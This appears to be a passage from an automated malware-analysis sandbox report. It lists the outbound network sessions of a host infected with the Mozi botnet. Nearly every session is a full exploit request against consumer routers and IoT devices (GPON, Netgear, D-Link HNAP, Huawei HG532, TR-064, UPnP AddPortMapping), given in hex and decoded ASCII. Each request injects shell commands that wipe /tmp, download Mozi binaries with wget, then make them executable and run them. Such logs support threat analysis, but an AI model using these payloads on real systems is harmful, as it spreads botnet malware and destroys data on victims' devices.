                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        110192.168.2.235077652.35.25.2080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581238985 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        111192.168.2.235308663.90.139.1028080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581258059 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        112192.168.2.2347336114.134.116.21452869
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581280947 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: /
                                                                        User-Agent: Hello-World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        113192.168.2.234113031.221.221.1048080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581305027 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        114192.168.2.23427846.197.162.2480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581337929 CET801OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 6.197.162.24:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        115192.168.2.2348190150.49.139.12980
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581367016 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        116192.168.2.2336662129.110.147.17580
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581393957 CET804OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 129.110.147.175:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        117192.168.2.2336822184.220.87.2415555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581424952 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        118192.168.2.2348714192.181.66.228080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581805944 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        119192.168.2.233334695.201.182.12737215
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581845999 CET822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                        Host: 95.201.182.127:37215
                                                                        Content-Length: 601
                                                                        Connection: keep-alive
                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        120192.168.2.2355738177.124.131.21052869
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581872940 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: /
                                                                        User-Agent: Hello-World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        121192.168.2.2336670108.175.170.1937574
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581892967 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:7574
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        122192.168.2.2348816103.159.239.638080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581923962 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        123192.168.2.2346456149.193.148.348080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581943989 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:8080
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        124192.168.2.2355166206.213.118.481
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581964970 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        125192.168.2.234272832.247.129.2468443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581981897 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        126192.168.2.235254419.154.130.11780
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582005024 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        127192.168.2.235259277.237.7.1318080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582026005 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        128192.168.2.2334596128.12.140.2468080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582042933 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        129192.168.2.2346434190.123.58.15449152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582082033 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 190.123.58.154:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
